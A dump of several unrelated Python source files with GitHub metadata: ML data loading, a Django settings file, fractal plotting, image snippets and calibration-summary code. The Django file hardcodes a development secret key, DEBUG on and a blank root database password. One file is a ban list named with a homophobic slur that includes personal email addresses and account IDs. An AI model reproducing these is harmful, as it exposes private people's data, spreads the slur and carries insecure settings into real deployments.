/TensorFlow/read_data_fast.py
|
730d80b46d49a7d9bbf378afea47209b5f9dc33d
|
[] |
no_license
|
pkq2006/DL_project
|
dcfa6854fc84ba37fe6640a85010f40f63bdbf5c
|
874faee5e42f2ebd94702c31f0732a5edf1542b0
|
refs/heads/master
| 2021-01-11T22:25:41.926588
| 2017-01-14T10:05:04
| 2017-01-14T10:05:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,015
|
py
|
import os
import numpy as np
import numpy
import PIL.Image
from sklearn import preprocessing
import json
import math
from scipy.ndimage import filters
global train_data, train_label, val_data, val_label, data_1, data_0
train_data, train_label, val_data, val_label, data_1, data_0 = [], [], [], [], [], []
ppp = -1
n_channels = 1
train_data_size = 0
val_data_size = 0
data_length = 40
eps = 1e-8
def readFile_processed(filename, ind, type):
global ppp, n_channels
data_, num1, num0, num1_, num0_ = [], [], [], [], []
fopen = open(filename, 'r')
for eachLine in fopen:
num0.append(float(eachLine))
fopen.close()
num0 = np.array(num0)
res_data = np.zeros((data_length, n_channels))
for i in xrange(n_channels):
res_data[:, i] = num0
data_0.append(res_data)
def eachFile1(filepath, type_):
global train_label, val_label
global train_data_size, val_data_size
pathDir = os.listdir(filepath)
_ = ''
for allDir in pathDir:
#child = os.path.join('%s/%s' % (filepath, allDir))
child = os.path.join('%s/%s' % (filepath, allDir))
ind = allDir.index('.')
#if(allDir[ind + 1 : len(allDir)] == 'engy'):
if(allDir[ind + 1 : len(allDir)] == 'f1'):
label_ = int(allDir[ind - 1]) - 1
if(type_ == 'mydata/train'):
train_data_size += 1
train_label.append(label_)
if(type_ == 'mydata/test_new'):
val_data_size += 1
val_label.append(label_)
pron = allDir[0:ind - 1]
#readFile(child, ind + len(filepath)+ 1, type_)
print child
readFile_processed(child, ind + len(filepath)+ 1, type_)
def eachFile0(filepath):
pathDir = os.listdir(filepath)
for allDir in pathDir:
child = os.path.join('./%s/%s' % (filepath, allDir))
eachFile1(child, filepath)
def read_data_():
global train_data, train_label, val_data, val_label, data_1, data_0
#eachFile0('train')
#eachFile0('test_new')
eachFile0('mydata/train')
eachFile0('mydata/test_new')
data_0 = np.array(data_0)
tmp_ = np.zeros([len(train_label), 4])
tmp_[np.arange(len(train_label)), train_label] = 1
train_label = tmp_
tmp_ = np.zeros([len(val_label), 4])
tmp_[np.arange(len(val_label)), val_label] = 1
val_label = tmp_
def next_train_batch(_size, iter_):
global train_data, train_label, n_channels
max_iter = train_data_size / _size
iter = iter_ % max_iter
return data_0[iter*_size : (iter + 1)*_size, :].reshape((_size, data_0.shape[1], n_channels)), train_label[iter*_size : (iter + 1)*_size]
def get_val():
global val_data, val_label, n_channels
return data_0[train_data_size : train_data_size+val_data_size,:].reshape((val_data_size, data_0.shape[1], n_channels)), val_label
|
[
"noreply@github.com"
] |
pkq2006.noreply@github.com
|
378e52f260636b95fcd858a293904a9f16a67b9c
|
6663e28f46da2e0922030bacbd44db11b670de7b
|
/api_core/settings.py
|
6a535032f464eadbfc50ca395c3f77e0d38dc317
|
[] |
no_license
|
LingzFY/mycode-rodin
|
e414746480dce703e450debfb1aaf1b9eb84b74d
|
a0e9b78f9c2e753cf5700642a1465e314467dd9a
|
refs/heads/main
| 2023-07-16T22:18:43.883445
| 2021-09-01T09:30:56
| 2021-09-01T09:30:56
| 402,000,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,668
|
py
|
"""
Django settings for api_core project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-(5-pi)m1(qi5_h%wwp7pqx9m9ovmyh8x)egq@&!io0obl25co@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# Django REST Framework
'rest_framework',
# Roda Indonesia Application
'rodin.apps.RodinConfig',
# Cors
'corsheaders',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# CORS
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
]
ROOT_URLCONF = 'api_core.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'api_core.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'rodin_db',
'USER': 'root',
'PASSWORD': '',
'HOST': '127.0.0.1',
'PORT': '3306',
}
}
CORS_ORIGIN_ALLOW_ALL = False
CORS_ORIGIN_WHITELIST = (
'http://localhost:8081',
)
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[
"mmd.ri.it@gmail.com"
] |
mmd.ri.it@gmail.com
|
9182b439f5699b1b77c86aa69612ae3e6b0f112e
|
6ebba9e904886dd3596d39e290851216fab62156
|
/Exercie_1.py
|
9427d10c780511c15c6705824e1c6ff7f54c7afc
|
[] |
no_license
|
Haitam-Hansali/Les_Fractales
|
58072533f09ddde5491b30780280446483d8126d
|
e0cb5cffef17e0df86ef821c2a764bf528de4cb7
|
refs/heads/main
| 2023-01-28T16:05:40.234392
| 2020-11-28T14:21:00
| 2020-11-28T14:21:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,019
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 28 14:27:40 2020
@author: Hansali haitam
"""
#EXERCICE_1:
import matplotlib.pyplot as plt
import random
X =[0.5]
Y =[0]
for i in range(30000):
r =random.uniform(0,1)
if 0 <= r <= 0.1:
Xf = 0.05* X[i]
Yf = 0.6* Y[i]
elif 0.1 <= r <= 0.2:
Xf = 0.05* X[i]
Yf = 1 - (0.5* Y[i])
elif 0.2 <= r <= 0.4:
Xf = 0.46* X[i] - 0.32* Y[i]
Yf = (0.38* Y[i]) + (0.39* X[i]) + 0.6
elif 0.4 <= r <= 0.6:
Xf = 0.47* X[i] - 0.15* Y[i]
Yf = (0.42* Y[i]) + (0.14* X[i]) + 1.1
elif 0.6 <= r <= 0.8:
Xf = 0.43* X[i] + 0.28* Y[i]
Yf = (0.45* Y[i]) - (0.25* X[i]) + 1.0
elif 0.8 <= r <= 1:
Xf = 0.42* X[i] + 0.26* Y[i]
Yf = (0.31* Y[i]) - (0.35* X[i]) + 0.7
X.append(Xf)
Y.append(Yf)
ax =plt.gca()
ax.set_xticks([])
ax.set_yticks([])
plt.plot(X,Y,'g.')
plt.show()
|
[
"noreply@github.com"
] |
Haitam-Hansali.noreply@github.com
|
1a4163ff58787277a95099da0f8fa828d14ab105
|
4cd3295b965849e8ba829c1c6a278043d669fe3c
|
/test/проверить ключ на забанненность/pidors.py
|
9c48c7705d016bf94255816189c3ca21b23c7701
|
[] |
no_license
|
helljump/cm2
|
9b7cb68ad364f5e5a2ec96abe95e7926ddda4370
|
6bf6e669c4625cd71eda70f602426e931e12ccd4
|
refs/heads/master
| 2016-09-05T08:49:33.662783
| 2015-01-17T13:40:48
| 2015-01-17T13:40:48
| 29,391,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,369
|
py
|
pidors = [
'Admin-36EEA004231E4FD', 'tester-TESTER-PC', 'Z127474187545', 'Admin-5D60624B80B74DD', 'Osetr-OSETR-WORKPC',
'Admin-MICROSOF-D1F7B6', 'z318420669104', 'R378538586068', 'Z354179671638', 'dovbyshv@gmail.com',
'Admin-NAMAHATA', 'ADMIN-MEGA', 'user-ANATOLY', 'toomas-PLACEHOL-FVXEIE', 'Admin-MICROSOF-0FA2C5',
'main-MAMKA', 'User-HOME-2272192ACA', 'Z407785278918', 'Krasotka-KRASOTKA-PC', 'Admin-NYK-ISIF',
'alex-USER1', 'Admin-AIRENIKUS', 'Z364177327629', 'tester-TESTER', 'Admin-MICROSOF-5D4CB3',
'Vladas-VLADAS-DESIGN', 'j-MICROSOF-D7AAE5', 'Admin-MICROSOF-A4F9A9', 'Admin-MICROSOF-D7AAE5', 'Z209938775706',
'utk4-NETBEE', 'User-HOME-5B052D450C', 'Z381530833701', '$-FIGHT', 'UserXP-HOME-BBED38D37C',
'Admin-COMPUTER-BF5983', 'Z294957846224', 'Z863385200368', 'tollevin-TOLLEVIN12345', 'UserXP-HOME-AF91F0E2CB',
'Vladas-VLADAS', 'kuzen-KUZEN-A5E61ACEA', 'Art-DEEPRED', 'Z171537790994', 'main-MAIN',
'pavel-WIN-BYVBPS97TLN', 'Admin-MICROSOF-96C76B', 'Z141179337829', 'UserXP-HOME-8104D23600', 'dima-PADAYATRA',
'User-HOME-49883FD08C', 'User-HOME-6D8386E7BD', 'Docent-DOCENT123456', 'User-HOME-B4231ACC8F', '5555-MICROSOF-BA4F2D',
'User-LOCALHOST', 'Admin-MICROSOF-D4A669', 'DEEPSPACE-DEEPSPACE-PC', 'Admin-MICROSOF-7C49A8', 'Admin-MICROSOF-3CA4F6',
'Dom-DOM-D87A55BAD9E', 'Admin-MICROSOF-E748E3', 'R686764339675', 'denis-WIN-BYVBPS97TLN', 'myAdmin-MY-HOME1598756',
'Admin-H1', 'UserXP-HOME-56EA1333FF', 'pavel-SRV1', 'admin-VYPOLZ', 'Admin-MICROSOF-BF3AA2',
'Z237980445101', 'Admin-MICROSOF-9050E0', 'Dima-PADAYATRA', 'User-HOME-5C8A4CC313', 'textkitzlo',
'Admin-MICROSOF-9A31BC', 'R287406349391', 'MaxSvargal-MAXSVARGAL-PC', 'Osetr-OSETR-PC', 'Admin-MICROSOF-77E453',
'Vladas-1DESIGN-ORG', 'uset-MICROSOF-9DA107', 'Admin-MICROSOF-E8D59B', 'R405773058842', 'Admin-MICROSOF-8D6F73',
'Docent-DOCENT1234', 'Home-COMPUTER', 'maxseopro@gmail.com', 'myAdmin-MICROSOF-AC801B', 'Admin-MICROSOF-A1C9D0',
'Admin-MICROSOF-6C0423', 'Admin-MIROS', 'Admin-MICROSOF-296A1C', 'pavel-ASUS-MOBILE', 'Admin-MYPC',
'User-HOME-D38B3AF830', 'User-USER-493C30A778', 'Admin-PADAYATRA', 'shisherin-HOME-5A9FE54DDD', 'Fight-FIGHTP',
'Hazir-FEDOR', 'Z535321499778', 'Admin-NIMDA-FFE26C8BF', 'Z311980518699', 'Admin-MICROSOF-306451',
'Admin-MICROSOF-11A007', 'Actav-NOUT', 'ruzon@mail.ru', 'MaxSvargal-GREMLINGER', 'flint-web-FLINT-WEB-DELL',
'webmasterready01', 'user-USER5', 'UserXP-HOME-96D1C6840F', 'User-HOME-561C3107B4', 'Elenka-LENA',
'Foot-FOOTP', 'irina-WIN-BYVBPS97TLN', 'shish-SHISH-PC', 'Osetr-SASHA', 'Krasotka-KRASOTKA',
'IHTIO-STAS-PC', 'main-TATO', 'Zhendozz-WINXPSP3PC', 'mamulka-MAMKA', 'ADMIN-Z',
'serj-BELOUSVPERED', '131628996452', 'Admin-MYCOMP', 'Tolik-TOLIK123456', 'Admin-8EDDA6AE3C1D466',
'insvate@gmail.com', 'Z381046724716', 'User-DRU', 'Admin-MICROSOF-6A25EE', 'zZ-ZZ-8AC2E607YM87',
'Admin-MICROSOF-D2CF41', 'tom-NABSTER-A4DD5BD', 'Admin-DEEPBLUE', 'Admin-MICROSOF-BF23D0', 'Admin-MICROSOF-0DFDC9',
'admin-KOMP1', 'Admin-ADMIN-HP', 'Arvinoff-MYCOMP', 'Z281431441904', 'Admin-MICROSOF-82E526',
'Z407539695153', 'Admin-MICROSOF-9469EB', 'Lena-SMILE', 'Hazir-HAZIR-PC', 'Admin-MICROSOF-51AB03',
'Admin-REANIMAT-C622FB', 'User-HOME-76D36947F0', 'Admin-MICROSOF-9DA107', 'home-666999', 'tester-MICROSOFT-PC',
'Vladimir-PACKARD-B790554', 'admin-ADMIN-MSI', 'zZ-ZZ-GIGVLP9ICXUI', 'WMID014428692510', ]
|
[
"helljump@gmail.com"
] |
helljump@gmail.com
|
75a0f0b8dfb71da6a23800c1e35e0baa5bc226fd
|
17b86db5397233f70ba9db376bd16aca9e72a751
|
/algos/segmentation/__init__.py
|
80831405e3f4096582d1beefcfd9033fd7a84f3a
|
[] |
no_license
|
javieraltszyler/IATos
|
50595f97cfa7b58d5f44cce86e6022a1219d3fe9
|
b3d5409d53b357f755e2d6a30ee1126c9de27534
|
refs/heads/main
| 2023-07-27T12:57:33.051010
| 2021-09-06T23:59:01
| 2021-09-06T23:59:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 63
|
py
|
from .entrypoint import find_caugh_segments, SegmentationParams
|
[
"dtrejopizzo@gmail.com"
] |
dtrejopizzo@gmail.com
|
ba234cf0c4b8f005e5bff6a3b7e6f08306842a0a
|
389acfd2f2f6f4869ad969f7820931f1077cd903
|
/bcdoc/compat.py
|
ee6d7c910b75b94246c2aa8df1621434c95e2828
|
[
"Apache-2.0"
] |
permissive
|
boto/bcdoc
|
567dcf892004022fffb0e307550676eb8727b7f5
|
eb14c2a4ecde75fae60ec0cb7d4147929a14d007
|
refs/heads/develop
| 2023-09-03T23:59:58.507910
| 2015-06-17T19:23:20
| 2015-06-17T19:23:20
| 9,522,814
| 5
| 7
|
NOASSERTION
| 2020-01-16T19:02:54
| 2013-04-18T13:55:05
|
Python
|
UTF-8
|
Python
| false
| false
| 723
|
py
|
# Copyright 2012-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
try:
from collections import OrderedDict
except ImportError:
# Python2.6 we use the 3rd party back port.
from ordereddict import OrderedDict
|
[
"kyleknap@amazon.com"
] |
kyleknap@amazon.com
|
00dacc8d53715bca065ecc63fda00d4fea71256c
|
fc2b62504f2e832c2aac4d5a6ac39ecf52a8d65f
|
/FEL-SSU/03 EM/snippets.py
|
e03353f5358c6b8a7074e7f9897797ba91af4ead
|
[] |
no_license
|
LukasHromadnik/CVUT
|
a995108e9f2b3f79551befb3b1399cee26edf7d4
|
18be904784ebb8ef33ab7009560686968a7a8e27
|
refs/heads/master
| 2023-01-07T10:16:20.219423
| 2022-12-27T07:00:18
| 2022-12-27T07:00:18
| 217,048,219
| 7
| 2
| null | 2022-12-14T06:19:52
| 2019-10-23T12:10:18
|
C++
|
UTF-8
|
Python
| false
| false
| 1,593
|
py
|
#!/usr/local/bin/python3
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
def to_image(img):
formatted = (img * 255).astype('uint8')
return Image.fromarray(formatted)
def compute_error(image, ground_truth):
diff = np.sum(abs(ground_truth - image))
result = diff / image.size
if result > 0.5:
result = 1 - result
return result * 100
# Print full array
# np.set_printoptions(threshold=np.nan)
def load_image(image_name):
im = Image.open(image_name).convert("RGB")
return np.array(im, dtype=np.float64) / 255.0
def plot_image(image, title=''):
plt.clf()
plt.axis('off')
plt.title(title)
plt.imshow(image)
plt.show()
def compute_mean(hand, is_foreground):
model = "model_init.png"
image = Image.open(model).convert("RGB")
arr = np.array(image, dtype=np.float64) / 255.0
background = 0.11764706
# middle = 0.50196078
foreground = 0.88235294
if is_foreground:
arr[arr > foreground] = 1
arr[arr < foreground] = 0
else:
arr[arr > background] = 2
arr[arr < background] = 1
arr[arr > 1] = 0
hand_copy = np.array(hand, copy=True)
counter = 0
w, h, d = tuple(hand_copy.shape)
for i in range(w):
for j in range(h):
if arr[i, j, 0] == 0:
hand_copy[i, j, 0] = 0
hand_copy[i, j, 1] = 0
hand_copy[i, j, 2] = 0
else:
counter += 1
mean = np.sum(hand_copy, axis=1)
mean = np.sum(mean, axis=0) / counter
return mean
|
[
"lukas.hromadnik@ackee.cz"
] |
lukas.hromadnik@ackee.cz
|
ca2f8bfe7c4032f38c05e442f2ebc72410381486
|
bd1b1fda138e6687dadc57317c3e312bc8872600
|
/mycode/lintcode/DP/non 584 drop-eggs-ii.py
|
b26afb05ade277e780791bb3532c797249226521
|
[] |
no_license
|
dundunmao/lint_leet
|
fc185038f57e0c5cbb82a74cebd4fe00422416cb
|
5788bd7b154649d2f787bbc4feb717ff2f4b4c59
|
refs/heads/master
| 2020-11-30T04:56:25.553327
| 2017-10-22T07:11:01
| 2017-10-22T07:11:01
| 96,705,212
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 437
|
py
|
# coding:utf-8
# There is a building of n floors. If an egg drops from the k th floor or above, it will break. If it's dropped from any floor below, it will not break.
#
# You're given m eggs, Find k while minimize the number of drops for the worst case. Return the number of drops in the worst case.
#
# Have you encountered this problem in a real interview? Yes
# Example
# Given m = 2, n = 100 return 14
# Given m = 2, n = 36 return 8
#
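#
# The submission above stops at the problem statement, so the following is an
# illustrative sketch (not the author's code): a standard DP over the number of
# drops, where cover[e] is the maximum number of floors that can be resolved
# with e eggs and the current number of drops.
def drop_eggs(m, n):
    drops = 0
    cover = [0] * (m + 1)
    while cover[m] < n:
        drops += 1
        # update from m downwards so cover[e - 1] still holds the value
        # for the previous number of drops
        for e in range(m, 0, -1):
            cover[e] = cover[e] + cover[e - 1] + 1
    return drops
# drop_eggs(2, 100) == 14
# drop_eggs(2, 36) == 8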
|
[
"dundunmao@gmail.com"
] |
dundunmao@gmail.com
|
ef2d49c6e8228d0db0cf4085723da7fb6610f6dd
|
914349e17aa5db5bd68e5a7535bdf693776a08b2
|
/calib/utils/summaries.py
|
51d5a3ea7a53e1f77e672e9b187ff5248b38ad6e
|
[] |
no_license
|
dirichletcal/experiments_neurips
|
f45007aa752597999d2c3bf11bdace34362968c0
|
54989edf11995f7f0f8390766e51133373044db2
|
refs/heads/master
| 2023-04-01T14:55:20.906559
| 2022-12-06T18:04:38
| 2022-12-06T18:04:38
| 217,910,102
| 17
| 5
| null | 2023-03-25T00:58:47
| 2019-10-27T20:08:11
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 53,965
|
py
|
import os
import re
import pandas as pd
import numpy as np
import math
from functools import partial
from calib.utils.functions import rankings_to_latex
# Visualisations
from calib.utils.plots import df_to_heatmap
from calib.utils.plots import export_dataset_analysis
from calib.utils.plots import export_critical_difference
from scipy.stats import ranksums
from scipy.stats import mannwhitneyu
from scipy.stats import friedmanchisquare
from scipy.stats import rankdata
import matplotlib.pyplot as pyplot
pd.set_option('display.width', 1000)
def load_all_csv(results_path, expression=".*.csv"):
regexp = re.compile(expression)
filename_list = []
df_list = []
for root, subdirs, files in os.walk(results_path, followlinks=True):
file_list = list(filter(regexp.match, files))
for filename in file_list:
if filename in filename_list:
continue
filename_list += filename
classifier = filename.split('_')[0]
try:
df_list.append(pd.read_csv(os.path.join(root, filename)))
df_list[-1]['classifier'] = classifier
df_list[-1]['filename'] = filename
except pd.errors.EmptyDataError as e:
print(e)
print('Classifier = {}, filename = {}'.format(classifier,
filename))
if df_list:
df = pd.concat(df_list)
else:
df = pd.DataFrame()
return df
def create_summary_path(summary_path, results_path='./'):
if summary_path is None:
summary_path = os.path.join(results_path, 'summary')
# Creates summary path if it does not exist
if not os.path.exists(summary_path):
print(summary_path)
os.makedirs(summary_path)
return summary_path
def compute_ranksums(table):
return paired_test(table, stats_func=ranksums)
def compute_mannwhitneyu(table):
return paired_test(table, stats_func=partial(mannwhitneyu,
alternative='less'))
def compute_friedmanchisquare(table):
'''
Example:
- n wine judges each rate k different wines. Are any of the k wines
ranked consistently higher or lower than the others?
Our Calibration case:
- n datasets each rate k different calibration methods. Are any of the
k calibration methods ranked consistently higher or lower than the
others?
This will output a statistic and a p-value
SciPy does the following:
- k: is the number of parameters passed to the function
    - n: is the length of each array passed to the function
The two options for the given table are:
- k is the datasets: table['mean'].values).tolist()
- k is the calibration methods: table['mean'].T.values).tolist()
'''
if table.shape[1] < 3:
        print('Friedman test is not appropriate for fewer than 3 methods')
class Ftest():
def __init__(self, statistic, pvalue):
self.statistic = statistic
self.pvalue = pvalue
return Ftest(np.nan, np.nan)
return friedmanchisquare(*(table.T.values).tolist())
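# Illustrative call (not part of the original module): `table` is expected to be
# a (datasets x methods) frame, i.e. one column per calibration method, e.g.
#
#   table = pd.DataFrame(np.random.rand(20, 4),
#                        columns=['uncal', 'isotonic', 'beta', 'dirichlet'])
#   ftest = compute_friedmanchisquare(table)
#   print(ftest.statistic, ftest.pvalue)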
def paired_test(table, stats_func=ranksums):
measure = table.columns.levels[0].values[0]
pvalues = np.zeros((table.columns.shape[0], table.columns.shape[0]))
statistics = np.zeros_like(pvalues)
for i, method_i in enumerate(table.columns.levels[1]):
for j, method_j in enumerate(table.columns.levels[1]):
if i == j:
continue
sample_i = table[measure, method_i]
sample_j = table[measure, method_j]
try:
statistic, pvalue = stats_func(sample_i, sample_j)
except ValueError as e:
print(e)
statistic, pvalue = np.nan, np.nan
pvalues[i, j] = pvalue
statistics[i, j] = statistic
index = pd.MultiIndex.from_product([table.columns.levels[1],
['statistic']])
df_statistics = pd.DataFrame(statistics,
index=table.columns.levels[1],
columns=index)
index = pd.MultiIndex.from_product([table.columns.levels[1],
['pvalue']])
df_pvalues = pd.DataFrame(pvalues,
index=table.columns.levels[1],
columns=index)
return df_statistics.join(df_pvalues)
def export_statistic_to_latex(df_statistic, filename, threshold=0.005,
caption='', label='', fontsize='\\small',
str_format='%.1f', position='tph'):
def pvalue_to_tex(s, p, threshold):
s = str_format % s
if p < threshold:
s = '\\bf{' + s + '}'
return s
statistics = df_statistic.xs('statistic', axis=1, level=1, drop_level=False)
pvalues = df_statistic.xs('pvalue', axis=1, level=1, drop_level=False)
table = np.empty((df_statistic.index.shape[0],
df_statistic.columns.levels[0].shape[0]),
dtype=np.object_)
for i, method_i in enumerate(df_statistic.index):
for j, method_j in enumerate(df_statistic.index):
table[i, j] = pvalue_to_tex(statistics.iloc[i, j],
pvalues.iloc[i, j],
threshold)
index = [x.replace('_', '\_') for x in df_statistic.index]
columns = [x.replace('_', '\_') for x in df_statistic.columns.levels[0]]
df = pd.DataFrame(table, index=index, columns=columns)
tex_table = df.to_latex(escape=False)
tex_table = ('\\begin{table}[' + position + ']\n\\centering\n' +
fontsize + '\n' + tex_table + ('\\caption{{{}}}\n' +
'\\label{{{}}}\n').format(caption, label) +
'\\end{table}')
with open(filename, 'w') as f:
f.write(tex_table)
def summarise_confusion_matrices(df, summary_path, set_title=False,
figsize=(16.5, 23.4)):
'''
figsize
- (8.27, 11.69) for an A4
- (11.69, 16.53) for an A3
- (16.5, 23.4) for an A2
'''
def MakeList(x):
T = tuple(x)
if len(T) > 1:
return T
else:
return T[0]
def confusion_matrix(string):
cm = np.fromstring(''.join(c for c in string if c in '0123456789 '), sep=' ')
cm = cm.reshape(int(np.sqrt(len(cm))), -1)
return cm
df['confusion_matrix'] = df['confusion_matrix'].apply(confusion_matrix)
for calibrator in df['method'].unique():
df_aux = df[df['method'] == calibrator]
df_aux = df_aux.pivot_table(index=['dataset'], columns=['classifier'],
values=['confusion_matrix'], aggfunc=MakeList)
fig = pyplot.figure(figsize=figsize) # (df_aux.shape[1]*3, df_aux.shape[0]*3))
if set_title:
fig.suptitle(calibrator)
ij = 1
for i, dat in enumerate(df_aux.index):
for j, cla in enumerate(df_aux.columns.levels[1]):
values = df_aux.loc[dat, ('confusion_matrix', cla)]
ax = fig.add_subplot(len(df_aux), len(df_aux.columns), ij)
if j == 0:
ax.set_ylabel(dat[:10])
if i == 0:
ax.set_title(cla)
ij += 1
if values is None:
print('There are no confusion matrices for {}, {}, {}'.format(
calibrator, dat, cla))
ax.set_xticklabels([])
ax.set_yticklabels([])
continue
cms = np.stack(values).mean(axis=0)
# FIXME solve problem here, it seems that values is always
# empty?
if isinstance(cms, np.float):
continue
cax = ax.pcolor(cms)
middle_value = (cms.max() + cms.min())/2.0
fontsize = min((30/(cms.shape[0]-2), 9))
for y in range(cms.shape[0]):
for x in range(cms.shape[1]):
color = 'white' if middle_value > cms[y, x] else 'black'
ax.text(x + 0.5, y + 0.5, '%.1f' % cms[y, x],
horizontalalignment='center',
verticalalignment='center',
color=color, fontsize=fontsize
)
ax.invert_yaxis()
fig.subplots_adjust(hspace = 0.0)
fig.tight_layout()
fig.savefig(os.path.join(summary_path,
'confusion_matrices_{}.pdf'.format(calibrator)))
def summarise_hyperparameters(df, summary_path, set_title=False,
figsize=(16.5, 23.4)):
'''
figsize
- (8.27, 11.69) for an A4
- (11.69, 16.53) for an A3
- (16.5, 23.4) for an A2
'''
def MakeList(x):
T = tuple(x)
if len(T) > 1:
return T
else:
return T[0]
# Histograms of parameters
    MAP_METHOD = {'OvR_Freq_Bin': r'n_bins=(?P<bins>\w+), ',
                  'OvR_Width_Bin': r'n_bins=(?P<bins>\w+), ',
                  'Dirichlet_L2': r" 'l2': ([0-9\.\-e]+),",
                  'OvR_Beta_L2': r" 'l2': ([0-9\.\-e]+),",
                  'dir_full_comp_l2': r" 'l2': ([0-9\.\-e]+),",
                  'dirichlet_full_prefixdiag_l2': r" 'l2': ([0-9\.\-e]+),",
                  'Log_Reg_L2': r" 'C': ([0-9\.\-e]+),",
                  'mlr_logit': r" 'C': ([0-9\.\-e]+),",
                  'OvR_Log_Reg_L2': r" 'C': ([0-9\.\-e]+),",
                  'ovr_mlr_logit': r" 'C': ([0-9\.\-e]+),",
                  }
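    # As a sketch of what these patterns pull out of a calibrator string
    # (hypothetical example): re.findall(r" 'l2': ([0-9\.\-e]+),",
    # "{ 'l2': 0.25, 'mu': 1}") returns ['0.25'].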
for key, regex in MAP_METHOD.items():
df_aux = df[df['method'] == key][['dataset', 'classifier', 'calibrators']]
if len(df_aux) == 0:
continue
df_aux['calibrators'] = df_aux['calibrators'].apply(lambda x:
np.array(re.findall(regex,
x)).astype(float))
df_aux = df_aux.pivot_table(index=['dataset'], columns=['classifier'],
values=['calibrators'], aggfunc=MakeList)
all_flat = df_aux.values.flatten()
all_flat = all_flat[all_flat != None]
all_flat = np.hstack(sum([aux for aux in all_flat if not
isinstance(aux, float)], ()))
all_unique = np.unique(all_flat)
sorted_idx = np.argsort(all_unique)
if (all_unique == np.floor(all_unique)).all():
xticklabels = [str(int(x)) for x in all_unique[sorted_idx]]
else:
xticklabels = [np.format_float_scientific(x, precision=2) for x in
all_unique[sorted_idx]]
print('Unique hyperparameters')
print(all_unique)
# Generate one barplot with all hyperparameters
fig = pyplot.figure(figsize=(3,2))
ax = fig.add_subplot(111)
uniq, counts = np.unique(all_flat, return_counts=True)
sorted_idx = np.argsort(uniq)
uniq = uniq[sorted_idx]
counts = counts[sorted_idx]
ax.bar(sorted_idx, counts)
ax.set_xticks(sorted_idx)
ax.set_xticklabels(xticklabels, rotation=45, ha='right')
fig.tight_layout()
fig.savefig(os.path.join(summary_path, 'bars_hyperparameters_all_{}.pdf'.format(key)))
# Generate one barplot per dataset and classifier combination
#fig = pyplot.figure(figsize=(df_aux.shape[1]*3, df_aux.shape[0]*3))
fig = pyplot.figure(figsize=figsize)
if set_title:
fig.suptitle(key)
ij = 0
for i, dat in enumerate(df_aux.index):
for j, cla in enumerate(df_aux.columns.levels[1]):
ij += 1
values = df_aux.loc[dat, ('calibrators', cla)]
ax = fig.add_subplot(len(df_aux), len(df_aux.columns), ij)
if isinstance(values, float) and math.isnan(values):
print('There are no hyperparameters for {}, {}, {}'.format(
key, dat, cla))
values = [[]]
parameters = np.concatenate(values).flatten()
uniq, counts = np.unique(parameters, return_counts=True)
missing_uniq = []
missing_counts = []
for all_u in all_unique:
if all_u not in uniq:
missing_uniq.append(all_u)
missing_counts.append(0)
uniq = np.concatenate((uniq, missing_uniq))
counts = np.concatenate((counts, missing_counts))
sorted_idx = np.argsort(uniq)
counts = counts[sorted_idx]
ax.bar(sorted_idx, counts)
ax.set_xticks(sorted_idx)
